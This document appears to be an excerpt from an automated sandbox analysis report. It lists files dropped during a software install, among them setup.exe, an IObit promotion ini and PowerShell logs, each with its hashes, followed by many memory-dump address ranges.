C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tlisho2t.vpb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3040-195-0x000001CFFD960000-0x000001CFFD982000-memory.dmp

memory/3040-208-0x00007FF8CAE50000-0x00007FF8CB911000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp\EULA.rtf

MD5 b0381f0ba7ead83ea3bd882c1de4cd48
SHA1 c740f811623061595d76fce2ebb4e69d34316f3b
SHA256 44bc9472169403484a0d384f1ca81989ef7e4b07441758e8a0110078933cbcb5
SHA512 6cfb8bc562d22843d043411720db97d0b4cbac96a20983d83d19e59b8428ec202f2532cc5af254438dc34fca4161abbd3f6bac8d397590e41b6d41e60700e78a

C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\setup.exe

MD5 3d403676517f6a99de035a04dc3f3f82
SHA1 ed69d8f485374dfb58a5b651b1f3f1bab8ee9541
SHA256 668f4f4ef277783cc66408d6631b63e9a24ffcd978834835fdb8fb2aa345a56e
SHA512 4ba6f75e9b518474bf9b846cda386bde0ca65233dd489b357b967e842af71ebca6e325b9fc9b8a0d1d775b16198ff31a6c2d2223797d2a3c490d5da001e8887e

memory/1748-260-0x0000000000400000-0x0000000000531000-memory.dmp

memory/1096-262-0x0000000000400000-0x000000000042C000-memory.dmp

memory/3184-263-0x0000000000BC0000-0x0000000000BC1000-memory.dmp

memory/3184-340-0x0000000002680000-0x0000000002690000-memory.dmp

C:\ProgramData\IObit\iobitpromotion.ini

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

C:\Users\Admin\AppData\Local\Temp\1713116766\ENGLISH.lng

MD5 8e7f2723f0e72bc6abefca738c9c1ca4
SHA1 969a4a6f31e146040a101d526886ede9a7c5c432
SHA256 f3c690feab9ab2b7dea8ea6334b484768f19caaf85dfa14be2bce5e4fdbffd4b
SHA512 9a3efa9dd002394050cbd457adb67121fcae7a31b66b42e3d612725b9166bd76c4f8c73ed039226c16248461c7f4f1fb6cac91960b7bb57a3273fbd022b1e232

memory/3608-363-0x0000000001B80000-0x0000000001B92000-memory.dmp

memory/3608-364-0x0000000001B60000-0x0000000001B66000-memory.dmp

memory/3940-365-0x0000000140000000-0x0000000140056000-memory.dmp

memory/3940-366-0x0000000140000000-0x0000000140056000-memory.dmp

memory/3940-367-0x0000000140000000-0x0000000140056000-memory.dmp

memory/3608-369-0x00007FF8CAE50000-0x00007FF8CB911000-memory.dmp

memory/3940-374-0x0000000140000000-0x0000000140056000-memory.dmp

memory/3940-380-0x0000000140000000-0x0000000140056000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/4780-391-0x00007FF8CAE50000-0x00007FF8CB911000-memory.dmp

memory/4780-392-0x000001CC1F290000-0x000001CC1F2A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

memory/4780-393-0x000001CC1F290000-0x000001CC1F2A0000-memory.dmp

memory/3608-395-0x0000000001B70000-0x0000000001B80000-memory.dmp

memory/5080-396-0x0000000003890000-0x00000000038C6000-memory.dmp

memory/5080-397-0x0000000072110000-0x00000000728C0000-memory.dmp

memory/5080-409-0x0000000003880000-0x0000000003890000-memory.dmp

memory/1160-407-0x000002C777C90000-0x000002C777CA0000-memory.dmp

memory/1160-410-0x000002C777C90000-0x000002C777CA0000-memory.dmp

memory/5080-408-0x0000000003F00000-0x0000000004528000-memory.dmp

memory/1160-411-0x00007FF8CAE50000-0x00007FF8CB911000-memory.dmp

memory/5080-412-0x0000000003E70000-0x0000000003E92000-memory.dmp

memory/5080-414-0x00000000047D0000-0x0000000004836000-memory.dmp

memory/5080-413-0x0000000004760000-0x00000000047C6000-memory.dmp

memory/4780-424-0x000001CC1F290000-0x000001CC1F2A0000-memory.dmp

memory/5080-425-0x0000000004940000-0x0000000004C94000-memory.dmp

memory/3184-426-0x0000000000BC0000-0x0000000000BC1000-memory.dmp

memory/5080-427-0x0000000004E00000-0x0000000004E1E000-memory.dmp

memory/5080-428-0x0000000004E40000-0x0000000004E8C000-memory.dmp

memory/1160-429-0x000002C77A060000-0x000002C77A0A0000-memory.dmp

memory/1160-430-0x00007FF8E9930000-0x00007FF8E9B25000-memory.dmp

memory/1160-431-0x00007FF8E8430000-0x00007FF8E84EE000-memory.dmp

memory/1080-432-0x0000000140000000-0x0000000140042000-memory.dmp

memory/1080-437-0x00007FF8E9930000-0x00007FF8E9B25000-memory.dmp

memory/1160-438-0x00007FF8CAE50000-0x00007FF8CB911000-memory.dmp

memory/1080-434-0x0000000140000000-0x0000000140042000-memory.dmp

memory/3184-441-0x0000000002680000-0x0000000002690000-memory.dmp

memory/1080-440-0x00007FF8E8430000-0x00007FF8E84EE000-memory.dmp

memory/3184-439-0x0000000000400000-0x0000000000A17000-memory.dmp

memory/1080-442-0x0000000140000000-0x0000000140042000-memory.dmp

memory/1080-433-0x0000000140000000-0x0000000140042000-memory.dmp

memory/4780-445-0x00007FF8CAE50000-0x00007FF8CB911000-memory.dmp

memory/3608-447-0x00007FF8CAE50000-0x00007FF8CB911000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

memory/3040-452-0x00007FF8CAF00000-0x00007FF8CB9C1000-memory.dmp

memory/616-453-0x000002DB3DA00000-0x000002DB3DA23000-memory.dmp

memory/616-459-0x00007FF8E99CD000-0x00007FF8E99CE000-memory.dmp

memory/668-458-0x000001DEC5010000-0x000001DEC503A000-memory.dmp

memory/668-460-0x00007FF8A99B0000-0x00007FF8A99C0000-memory.dmp

memory/960-464-0x000001BDF15D0000-0x000001BDF15FA000-memory.dmp

memory/668-465-0x00007FF8E99CD000-0x00007FF8E99CE000-memory.dmp

memory/668-462-0x000001DEC5010000-0x000001DEC503A000-memory.dmp

memory/616-456-0x000002DB3DA90000-0x000002DB3DABA000-memory.dmp

memory/960-467-0x00007FF8A99B0000-0x00007FF8A99C0000-memory.dmp

memory/64-466-0x00000207584C0000-0x00000207584EA000-memory.dmp

memory/960-470-0x000001BDF15D0000-0x000001BDF15FA000-memory.dmp

memory/64-472-0x00007FF8A99B0000-0x00007FF8A99C0000-memory.dmp

memory/3040-474-0x0000028205760000-0x0000028205770000-memory.dmp

memory/64-475-0x00000207584C0000-0x00000207584EA000-memory.dmp

memory/3040-473-0x0000028205760000-0x0000028205770000-memory.dmp

memory/960-471-0x00007FF8E99CC000-0x00007FF8E99CD000-memory.dmp

memory/732-477-0x0000020F8A4B0000-0x0000020F8A4DA000-memory.dmp

memory/668-468-0x00007FF8E99CF000-0x00007FF8E99D0000-memory.dmp

memory/732-479-0x00007FF8A99B0000-0x00007FF8A99C0000-memory.dmp

memory/1052-486-0x00007FF8A99B0000-0x00007FF8A99C0000-memory.dmp

memory/1052-483-0x00000195A2560000-0x00000195A258A000-memory.dmp

memory/1116-489-0x000002800E4A0000-0x000002800E4CA000-memory.dmp

memory/5080-485-0x0000000072110000-0x00000000728C0000-memory.dmp

memory/732-482-0x0000020F8A4B0000-0x0000020F8A4DA000-memory.dmp

memory/1144-497-0x00007FF8A99B0000-0x00007FF8A99C0000-memory.dmp

memory/1116-491-0x00007FF8A99B0000-0x00007FF8A99C0000-memory.dmp

memory/1144-494-0x000001CFAC6A0000-0x000001CFAC6CA000-memory.dmp

memory/1168-496-0x000002443D8F0000-0x000002443D91A000-memory.dmp

memory/1168-499-0x00007FF8A99B0000-0x00007FF8A99C0000-memory.dmp

memory/1176-503-0x00007FF8A99B0000-0x00007FF8A99C0000-memory.dmp

memory/1276-505-0x000001CB35530000-0x000001CB3555A000-memory.dmp

memory/1276-508-0x00007FF8A99B0000-0x00007FF8A99C0000-memory.dmp

memory/1176-507-0x000001CF99060000-0x000001CF9908A000-memory.dmp

memory/5080-511-0x0000000003880000-0x0000000003890000-memory.dmp

memory/5080-510-0x0000000003880000-0x0000000003890000-memory.dmp

memory/1276-512-0x000001CB35530000-0x000001CB3555A000-memory.dmp

memory/1168-504-0x000002443D8F0000-0x000002443D91A000-memory.dmp

memory/1176-500-0x000001CF99060000-0x000001CF9908A000-memory.dmp